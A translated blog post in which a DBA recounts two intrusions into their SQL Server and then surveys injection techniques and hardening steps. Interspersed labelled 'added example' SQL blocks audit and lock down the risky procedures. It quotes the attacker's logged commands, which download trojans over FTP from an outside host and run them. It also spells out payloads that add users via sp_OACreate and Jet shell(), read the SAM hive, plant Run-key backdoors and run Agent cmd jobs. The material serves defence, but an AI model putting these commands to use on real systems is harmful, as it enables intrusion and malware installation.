SQL Server injection and security protection

Source: Internet
Author: User
Tags: mssqlserver, sql server, injection, strong password
The attacker got in twice through the same vulnerability. Each time, the sqlserver.exe process launched cmd.com, which generated two files, *.sys and *.bat, and then used ftp.exe to download the trojan file, at which point the anti-virus software raised an alert.

The following are the commands executed by cmd.com in the two attacks.
"C:\WINDOWS\system32\cmd.com" /c net1 stop sharedaccess & echo open 218.61.11.97> dboy.sys & echo 11> dboy.sys & echo 11> dboy.sys & echo get pc.exe C:\boots.exe> dboy.sys & echo bye> dboy.sys & echo ftp -s:dboy.sys> dboy.bat & echo copy C:\boots.exe C:\WINDOWS\system32\inf\test.exe & echo start /high "C:\WINDOWS\system32\inf\test.exe" & echo start C:\boots.exe> dboy.bat & echo start C:\boots.exe> dboy.bat & echo del dboy.sys> dboy.bat & echo del %0> dboy.bat & dboy.bat

"C:\WINDOWS\system32\cmd.com" /c SC stop sharedaccess & echo open ddosboy1.3322.org> dboy1.sys & echo dboy> dboy1.sys & echo if> dboy1.sys & echo get dboy1.c:\Windows\tcpsrv1.exe> dboy1.sys & echo bye> dboy1.sys & echo ftp -s:dboy1.sys> system1.bat & echo start C:\Windows\tcpsrv1.exe> system1.bat & echo start C:\Windows\tcpsrv1.exe> system1.bat & echo del dboy1.sys> system1.bat & echo del %0> system1.bat & system1.bat



After the first compromise, the SQL Server was hardened and the xp_cmdshell extended stored procedure was dropped for security. Less than a month later, it was compromised again.
This time I checked the database log: xp_cmdshell had not been restored, but execution records of the sp_OACreate and sp_OAMethod stored procedures were found in the log.
So I went online to learn more, and some of what I learned is recorded below:
1. Elementary SQL injection attack
When a novice hacker attacks SQL Server, the first method is to call xp_cmdshell in the master database to run commands: add users, write files, plant trojans.
To deal with such hackers, you only need to disable the xp_cmdshell stored procedure.
xp_cmdshell is a built-in extended stored procedure that executes arbitrary command-line commands. For example:
Exec master..xp_cmdshell 'dir'
returns the directory listing of the current working directory of the SQL Server process.

Exec master..xp_cmdshell 'net user'
returns a list of all users on the server. When SQL Server runs as the system account or a domain account, an attacker can do far more serious damage.

The two examples above show how powerful xp_cmdshell is, which also means how destructive it can be.
In general, administrators do not need xp_cmdshell, and removing it will not affect the server.
You can remove xp_cmdshell as follows:
Use master
Exec sp_dropextendedproc 'xp_cmdshell'
Go

If necessary, you can restore xp_cmdshell:
Use master
Exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
Go

If necessary, you can also delete the xplog70.dll file, but back it up first.

For SQL 2005:

In SQL 2005, xp_cmdshell cannot be executed by default. Is that secure? It can still be switched on and off with sp_configure:


Enable execution of the xp_cmdshell stored procedure:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Disable execution of the xp_cmdshell stored procedure:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
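The following is an added example, not code from the original post, showing how a DBA on SQL 2005 or later can audit and switch off in one pass the three surface-area options that the attacks on this page depend on (xp_cmdshell, the OLE Automation procedures, and ad hoc distributed queries such as OpenRowSet). It assumes sys.configurations is available and a sysadmin connection.

```sql
-- Added example (not from the original post): audit and lock down the
-- sp_configure surface-area options that the attacks on this page rely on.
-- Assumes SQL Server 2005 or later (sys.configurations exists) and a
-- sysadmin connection.

-- 1. Show the current state of the risky options before touching anything.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',   -- sp_OACreate / sp_OAMethod
               'Ad Hoc Distributed Queries')  -- OpenRowSet / OpenDatasource
ORDER BY name;

-- 2. Disable them. 'show advanced options' must be on to see or set these.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
-- Hide the advanced options again so a plain sp_configure call does not list them.
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Verify: any row returned here is still enabled and needs attention.
SELECT name
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries')
  AND CAST(value_in_use AS int) <> 0;
```

Run the first and third queries on a schedule as well: an attacker with sysadmin rights can re-enable these options exactly the way the post shows, so the verification query doubles as a detection check.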

Deleting xplog70.dll affects some functions of Enterprise Manager; what I ran into is that I could no longer view the database server properties in Enterprise Manager.

2. Intermediate SQL injection attack
After the above operations, is the SQL Server protected? No. This only works against novices who have just learned SQL injection; intermediate and veteran attackers can do much more.
Now let's look at the intermediate injection methods.
Once the database administrator has disabled xp_cmdshell and deleted xplog70.dll and the file upload function, using xp_cmdshell is no longer feasible.
However, Microsoft also provides other stored procedures that let an intermediate hacker break into the system.
1) Using the OLE object interface
SQL Server provides functions for accessing OLE objects, including sp_OACreate and sp_OAMethod.
They can call OLE controls to indirectly obtain a shell: use sp_OACreate to create a wscript.shell object and assign it to the variable @shell, then use sp_OAMethod to call the object's run method to execute a command.

DECLARE @shell INT
EXEC sp_OACreate 'wscript.shell', @shell OUT
EXEC sp_OAMethod @shell, 'run', null, 'net user hack /add'


2) Enable the Access sandbox mode
By default, the Jet data engine does not allow SQL statements such as select shell("net user ray /add").
However, once the JET engine's sandbox mode is enabled, the command can be executed:
use the xp_regwrite stored procedure to rewrite the registry, use OpenRowSet to open an Access database file that ships with the system, and then execute the SQL statement that runs the command.

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 3

SandBoxMode values:
The default value is 2.
0 -- sandbox mode is always disabled.
1 -- sandbox mode is used for non-Access applications.
2 -- sandbox mode is used for Access applications.
3 -- sandbox mode is fully enabled.

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'select shell("net user hack /add")');


3) Writing registry keys with the xp_regxxxx stored procedures
This method can only be used with the sa account or a sysadmin account.
Run:
Exec xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'
If you encounter a careless administrator, you may be able to get the Administrator's password.
Or add a startup item, and so on.
Use xp_regwrite to write a registry value, writing the command to be executed directly into the Run startup key:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'shell', 'REG_SZ', 'c:\windows\system32\cmd.exe /c net user hack /add'

Remove all of these extended procedures if necessary:
xp_regaddmultistring (add an entry to the registry)
xp_regdeletekey (delete a key from the registry)
xp_regdeletevalue (delete a value from the registry)
xp_regenumvalues (list the values under a key)
xp_regread (read a value under a key)
xp_regremovemultistring (remove an entry from the registry)
xp_regwrite (write data to the registry)
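The following is an added example, not code from the original post, giving the defender's read-only counterpart to sections 2) and 3): it reads back the Jet SandBoxMode value and lists the contents of the Run startup key so that a rewritten sandbox setting or an unexpected startup entry can be spotted during a review. It assumes the xp_regread and xp_regenumvalues procedures are still present (the post recommends keeping xp_regread) and a sysadmin connection.

```sql
-- Added example (not from the original post): a defender's read-only check of
-- the two registry locations abused in sections 2) and 3) above.
-- Assumes xp_regread / xp_regenumvalues are still installed and the caller
-- is a sysadmin.

-- 1. Jet SandBoxMode: the attack above rewrites this value so that
--    OpenRowSet('Microsoft.Jet.OLEDB.4.0', ...) can run shell().
--    Compare the result with the value recorded in your baseline.
DECLARE @sandbox int;
EXEC master.dbo.xp_regread
     @rootkey    = 'HKEY_LOCAL_MACHINE',
     @key        = 'Software\Microsoft\Jet\4.0\Engines',
     @value_name = 'SandBoxMode',
     @value      = @sandbox OUTPUT;
SELECT @sandbox AS jet_sandboxmode;

-- 2. Run startup key: xp_regenumvalues returns one result set per value,
--    so every entry (including a 'shell' value written by xp_regwrite as in
--    section 3) is listed for manual review.
EXEC master.dbo.xp_regenumvalues
     'HKEY_LOCAL_MACHINE',
     'Software\Microsoft\Windows\CurrentVersion\Run';
```

Both calls only read the registry. If SandBoxMode differs from the baseline, or the Run key contains an entry nobody can account for, treat the instance as compromised rather than just correcting the value, because the post's own incident shows the attacker coming back once the first hole was closed.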

4) Executing commands with SQL Server Agent
By default, this service is disabled. xp_servicecontrol can be used to start SQLSERVERAGENT, create a scheduled job, and run it immediately:

Exec master.dbo.xp_servicecontrol 'start', 'sqlserveragent'
Use msdb
Exec sp_delete_job null, 'x'
Exec sp_add_job 'x'
Exec sp_add_jobstep null, 'x', null, '1', 'cmdexec', 'cmd /c dir C:\'
Exec sp_add_jobserver null, 'x', @@servername
Exec sp_start_job 'x'
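The following is an added example, not code from the original post, showing how to detect the Agent abuse described in 4): a job that runs an operating-system command is left behind in msdb, so a periodic query of the job tables finds it. It assumes the msdb.dbo.sysjobs and sysjobsteps tables of SQL 2000/2005 and a sysadmin connection.

```sql
-- Added example (not from the original post): detect the SQL Server Agent
-- abuse in 4) above, which leaves a job with a CmdExec step behind.
-- Assumes the msdb job tables of SQL Server 2000/2005 (sysjobs, sysjobsteps)
-- and a sysadmin connection.

-- 1. Is the Agent service running at all? 'querystate' is read-only and
--    returns the current service state.
EXEC master.dbo.xp_servicecontrol 'querystate', 'SQLSERVERAGENT';

-- 2. Every job step that leaves T-SQL and touches the OS, or that calls the
--    procedures discussed on this page. A legitimate server has very few of
--    these, so each one should be known and documented.
SELECT j.name          AS job_name,
       j.date_created,
       s.step_id,
       s.step_name,
       s.subsystem,
       s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'ActiveScripting')
   OR s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%sp_OACreate%'
ORDER BY j.date_created DESC;

-- 3. Jobs created in the last day: the attack creates and starts a job
--    immediately, so recent jobs deserve a look regardless of subsystem.
SELECT j.name, j.date_created, SUSER_SNAME(j.owner_sid) AS owner_login
FROM msdb.dbo.sysjobs AS j
WHERE j.date_created > DATEADD(day, -1, GETDATE())
ORDER BY j.date_created DESC;
```

Compare the second result against a saved list of approved jobs; a job named with a single letter, created a moment ago by sa, and running cmd is exactly the footprint of the sequence above.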

Besides these four methods there are others, but I don't know much about them, so I won't list them all.

3. Obtaining other system information

List a directory tree:
Exec master.dbo.xp_dirtree 'C:\'
Retrieve sub-directories:
Exec master.dbo.xp_subdirs 'C:\'
List available system partitions:
Exec master.dbo.xp_availablemedia
Determine whether a directory or file exists:
Exec master..xp_fileexist 'C:\boot.ini'
And so on.

IV. Advanced injection techniques
I did not find any learning material on advanced injection techniques on the Internet; I think they are only spread within a small circle of people, so there is nowhere to start talking about them.


V. Key points and methods for defending against SQL injection
1. Confirm that the latest patches for Windows and SQL Server are installed.
2. Evaluate and choose the most secure network protocol that does not affect functionality. Multi-Protocol is a wise choice, but it sometimes cannot be used in a heterogeneous environment.
Note: remove unnecessary network protocols if possible.
3. Set strong passwords for sa and for accounts with sysadmin permissions. What is a strong password? I personally think it is a combination of letters, numbers and special characters, at least 8 characters long.
4. Use a low-privilege account as the SQL Server service account. Do not use LocalSystem or sa.
This low-privilege account should have only the minimum permissions, restricting what SQL Server can query and access. Many things in SQL Server can be queried with minimum permissions; if they are not needed, do not grant additional permissions.
Note: when you make these settings in Enterprise Manager, the permissions on files, the registry and user rights are handled for you.

5. Make sure all SQL Server data and system files are on NTFS partitions and that directory access control is applied.
If someone gains access to the system, this level of permission can prevent the intruder from damaging the data and avoid a disaster.

6. If you do not need xp_cmdshell, disable it. Add it back if needed.
In fact, this alone is not good enough: if an intruder finds it missing, they only need to add it back. Consider removing the DLL as well, but test before removing it, because some DLL files are shared by other programs at the same time.
To find out whether other extended procedures use the same DLL, do the following:
First, get the DLL:
Select o.name, c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name = 'xp_cmdshell'
Second, find whether other extended stored procedures use the same DLL:
Select o.name, c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xplog70.dll'
You can use the same method for other procedures you want to remove in the following steps.

7. Disable the OLE Automation stored procedures if they are not needed (warning: some Enterprise Manager functions may be lost when these procedures are disabled). They are:
sp_OACreate
sp_OADestroy
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop
If you decide to stop these stored procedures, please write a script for them so that you can re-add them when you use them later.
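The following is an added example, not code from the original post, that does what points 6 and 7 ask for: it records how to re-create each extended procedure before dropping it, checks which other procedures share the same DLL (so the DLL file is not deleted while something still needs it), and then drops the listed procedures. It assumes the SQL 2000 system tables, where syscomments.text holds the DLL name for an extended procedure (xtype = 'X'); on SQL 2005 the sp_configure approach shown earlier is the supported way to disable xp_cmdshell and the OLE Automation procedures.

```sql
-- Added example (not from the original post): before dropping extended
-- procedures as in points 6 and 7, record how to put each one back.
-- Assumes SQL Server 2000 system tables (sysobjects/syscomments, where
-- syscomments.text holds the DLL name for an extended procedure, xtype = 'X').
USE master;

-- Procedures this script will remove; edit the list for your own evaluation.
-- One INSERT per name (multi-row VALUES needs SQL 2008 or later).
DECLARE @victims TABLE (name sysname);
INSERT INTO @victims (name) VALUES ('xp_cmdshell');
INSERT INTO @victims (name) VALUES ('sp_OACreate');
INSERT INTO @victims (name) VALUES ('sp_OAMethod');

-- 1. Emit the statements that restore each procedure. Save this output
--    somewhere safe before running step 3.
SELECT 'EXEC sp_addextendedproc ''' + o.name + ''', ''' + c.text + ''''
       AS restore_statement
FROM dbo.sysobjects AS o
JOIN dbo.syscomments AS c ON c.id = o.id
JOIN @victims AS v ON v.name = o.name
WHERE o.xtype = 'X';

-- 2. Which other extended procedures share a DLL with a procedure on the
--    list? Do not delete the DLL file while this query returns rows.
SELECT other.name AS still_needs_dll, c.text AS dll
FROM dbo.sysobjects AS o
JOIN dbo.syscomments AS c    ON c.id = o.id
JOIN @victims AS v           ON v.name = o.name
JOIN dbo.syscomments AS c2   ON c2.text = c.text
JOIN dbo.sysobjects AS other ON other.id = c2.id AND other.xtype = 'X'
WHERE o.xtype = 'X'
  AND other.name NOT IN (SELECT name FROM @victims);

-- 3. Drop them, only after the output of steps 1 and 2 has been reviewed.
DECLARE @name sysname;
DECLARE cur CURSOR FOR SELECT name FROM @victims;
OPEN cur;
FETCH NEXT FROM cur INTO @name;
WHILE @@FETCH_STATUS = 0
BEGIN
    EXEC sp_dropextendedproc @name;
    FETCH NEXT FROM cur INTO @name;
END
CLOSE cur;
DEALLOCATE cur;
```

Keep the restore statements from step 1 under change control: the post's point that an intruder can simply add xp_cmdshell back applies to you too, so the saved script is what makes the removal reversible for you without being a shortcut for an attacker who already has sysadmin.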

8. Disable the registry stored procedures you do not need (as mentioned above). These include:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumvalues
xp_regremovemultistring
Note: removing xp_regread/xp_regwrite affects logging and the installation of service packs, so their removal is not recommended.


9. Remove other system stored procedures that you consider a threat. There are quite a lot of them, and they also consume some CPU time.
Be careful not to do this on a production server first: test on a development machine and confirm that it does not affect any system function. Below is a list we recommend for your evaluation:
sp_sdidebug
xp_availablemedia
xp_cmdshell
xp_deletemail
xp_dirtree
xp_dropwebtask
xp_dsninfo
xp_enumdsn
xp_enumerrorlogs
xp_enumgroups
xp_enumqueuedtasks
xp_eventlog
xp_findnextmsg
xp_fixeddrives
xp_getfiledetails
xp_getnetname
xp_grantlogin
xp_logevent
xp_loginconfig
xp_logininfo
xp_makewebtask
xp_msver
xp_perfend
xp_perfmonitor
xp_perfsample
xp_perfstart
xp_readerrorlog
xp_readmail
xp_revokelogin
xp_runwebtask
xp_schedulersignal
xp_sendmail
xp_servicecontrol
xp_snmp_getstate
xp_snmp_raisetrap
xp_sprintf
xp_sqlinventory
xp_sqlregister
xp_sqltrace
xp_sscanf
xp_startmail
xp_stopmail
xp_subdirs
xp_unc_to_drive


10. Remove the guest account from databases to exclude unauthorized users. The exceptions are the master and tempdb databases, where the guest account is required.

11. If not required, disable SQL Mail completely. Its presence makes it possible for an attacker to deliver trojans or viruses, or simply to mount a DoS attack.

12. Log all user access. Configure this in Enterprise Manager, or log in as sa and run the following in Query Analyzer:
xp_instance_regwrite N'HKEY_LOCAL_MACHINE', N'Software\Microsoft\MSSQLServer\MSSQLServer', N'AuditLevel', REG_DWORD, 3

13. Create a scheduled task to run:
Then redirect the output to a text file or an email, so that you can monitor failed login attempts.
This also gives system administrators a good way to record attacks. There are also many third-party tools for analyzing NT event logs.
Note: you may need to change the path to your SQL installation path.

14. Set alerts for unauthorized access and login failures. Go to "Manage SQL Server Messages" in Enterprise Manager and search for any messages about denied access
(start by searching for "login failed" and "denied"). Make sure all the messages you are interested in are written to the event log. Then set an alert on those messages to send an email or page to an operator who can respond promptly to the problem.
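The following is an added example, not code from the original post, that ties points 12 to 14 together: it confirms the AuditLevel value actually in effect, pulls the "Login failed" lines out of the current SQL Server error log, and summarises them so that a brute-force attempt shows up as one row with a large count, ready to be mailed or filed. It assumes SQL 2005 or later, where xp_readerrorlog accepts a log number, a log type and a search string and returns LogDate, ProcessInfo and Text columns, and a sysadmin connection.

```sql
-- Added example (not from the original post): after AuditLevel is set to 3
-- (point 12), failed and successful logins are written to the SQL Server
-- error log. This reads that log for failures so the output can be mailed
-- or filed as points 13 and 14 suggest.
-- Assumes SQL Server 2005 or later (xp_readerrorlog with search string,
-- columns LogDate / ProcessInfo / Text) and a sysadmin connection.

-- 1. Confirm the audit level actually in effect (3 = log failures and successes).
DECLARE @audit int;
EXEC master.dbo.xp_instance_regread
     N'HKEY_LOCAL_MACHINE',
     N'Software\Microsoft\MSSQLServer\MSSQLServer',
     N'AuditLevel',
     @audit OUTPUT;
SELECT @audit AS audit_level;

-- 2. Pull every 'Login failed' line from the current log (0) of type SQL (1).
CREATE TABLE #fails (LogDate datetime, ProcessInfo nvarchar(64), [Text] nvarchar(max));
INSERT INTO #fails
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed';

-- 3. Summarise. The message text carries the login name and the client
--    address, so grouping by it gives one row per (login, source) pair;
--    a password-guessing run stands out as a single row with a large count.
SELECT COUNT(*)     AS attempts,
       MIN(LogDate) AS first_seen,
       MAX(LogDate) AS last_seen,
       [Text]
FROM #fails
GROUP BY [Text]
HAVING COUNT(*) >= 5          -- threshold: tune to your environment
ORDER BY attempts DESC;

DROP TABLE #fails;
```

Schedule this as an Agent job or run it from the task the post describes in point 13; pair it with the Enterprise Manager alert from point 14 so that the summary is the follow-up to the alert rather than a replacement for it.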

15. Regularly review the members of groups and roles, and assign permissions to groups rather than to individuals, so that your audit work is simplified. Make sure that the public role cannot select from the system tables.

16. Take some time to audit logins with a blank password. Use the following query to check for empty passwords:
Select password, *
From syslogins
Where password is null
Order by name
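The following is an added example, not code from the original post, giving the SQL 2005 equivalent of the point 16 check: syslogins.password is no longer populated there, so the test uses sys.sql_logins.password_hash with PWDCOMPARE(). It also lists logins that bypass the Windows password policy, which is where the "strong password" requirement of point 3 is enforced. It assumes SQL 2005 or later and a connection with CONTROL SERVER permission; the login name in the ALTER LOGIN line is a placeholder.

```sql
-- Added example (not from the original post): the SQL 2005 equivalent of the
-- blank-password check in point 16. syslogins.password is no longer populated
-- there; sys.sql_logins.password_hash plus PWDCOMPARE() does the job.
-- Assumes SQL Server 2005 or later and CONTROL SERVER permission.

-- 1. SQL logins whose password is blank or equal to the login name.
SELECT name,
       CASE WHEN PWDCOMPARE('', password_hash) = 1   THEN 'blank'
            WHEN PWDCOMPARE(name, password_hash) = 1 THEN 'same as login name'
       END AS finding,
       is_policy_checked,      -- 0 = the Windows password policy is bypassed
       is_expiration_checked,
       is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1
ORDER BY name;

-- 2. SQL logins that skip the Windows password policy altogether; these are
--    the ones that can hold a weak password without being stopped at creation.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE is_policy_checked = 0
ORDER BY name;

-- 3. Enforce the policy on one login (replace the placeholder name).
-- ALTER LOGIN [app_login_placeholder] WITH CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
```

Any login returned by the first query should have its password changed immediately and, if it is sa, should also be renamed or disabled if your applications allow it; the second query is the list to work through before the next audit.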


17. Check the permissions of all non-sa users on stored procedures and extended stored procedures. Use the following query regularly to find out which procedures public can execute:
Use master
Select sysobjects.name
From sysobjects, sysprotects
Where sysprotects.uid = 0
AND xtype in ('X', 'P')
AND sysobjects.id = sysprotects.id
Order by name
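The following is an added example, not code from the original post, rewriting the point 17 check against the SQL 2005 catalog views, where public's grants are explicit rows in sys.database_permissions rather than sysprotects.uid = 0. The second query goes a step further than the post and lists every principal, not only public, that can execute the registry and directory procedures named on this page. It assumes SQL 2005 or later.

```sql
-- Added example (not from the original post): the point 17 check rewritten
-- against the SQL 2005 catalog views, where public's grants are explicit rows
-- in sys.database_permissions instead of sysprotects.uid = 0.
-- Assumes SQL Server 2005 or later.
USE master;

-- 1. Stored and extended procedures in master that public may execute.
SELECT o.name,
       o.type_desc,
       p.permission_name,
       p.state_desc
FROM sys.objects AS o
JOIN sys.database_permissions AS p
     ON p.major_id = o.object_id AND p.class = 1          -- 1 = object or column
WHERE o.type IN ('X', 'P')                                -- X = extended, P = procedure
  AND p.grantee_principal_id = DATABASE_PRINCIPAL_ID('public')
  AND p.permission_name = 'EXECUTE'
  AND p.state IN ('G', 'W')                               -- GRANT / GRANT WITH GRANT OPTION
ORDER BY o.name;

-- 2. For the registry and directory procedures named on this page, list
--    every principal (not only public) that holds EXECUTE on them.
SELECT o.name, dp.name AS grantee, dp.type_desc AS grantee_type, p.state_desc
FROM sys.objects AS o
JOIN sys.database_permissions AS p ON p.major_id = o.object_id AND p.class = 1
JOIN sys.database_principals AS dp ON dp.principal_id = p.grantee_principal_id
WHERE o.name IN ('xp_regread', 'xp_regwrite', 'xp_regenumvalues', 'xp_regdeletekey',
                 'xp_regdeletevalue', 'xp_regaddmultistring', 'xp_regremovemultistring',
                 'xp_dirtree', 'xp_subdirs', 'xp_fileexist', 'xp_availablemedia',
                 'xp_servicecontrol')
  AND p.permission_name = 'EXECUTE'
ORDER BY o.name, dp.name;

-- 3. Revoke a grant found above (edit the procedure name as needed).
-- REVOKE EXECUTE ON master.dbo.xp_dirtree FROM public;
```

Several of these procedures are executable by public in a default installation, so the first run of this script usually produces a list to discuss with application owners rather than an empty result; record the approved exceptions and diff against them on subsequent runs.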

18. Use the integrated security (Windows authentication) mode. In the past, Enterprise Manager in standard security mode was found to store the sa password in plaintext in the registry. Note: even if you change the mode, the password remains in the registry.

For SQL 2000:

Use regedit and check the key:
HKEY_USERS\{yourSID}\Software\Microsoft\Microsoft SQL Server\80\Tools\SQLEW\Registered Servers X\SQL Server Group
("SQL Server Group" is the default; if you created your own server group, change the location accordingly.)

SQL 2005 no longer writes the SQLEW key to the registry.


19. Create a security review plan and produce a security report every month. Reports available to the IT director include database modifications, successful attacks, backup protection, and object access failure statistics for newly developed content.

20. Do not allow users to log on to SQL Server interactively. This rule applies to any server: once a user can log on to a server interactively, administrator privileges can be obtained.

Finally, I still don't know how the other party found the dynamic IP address of my development machine.
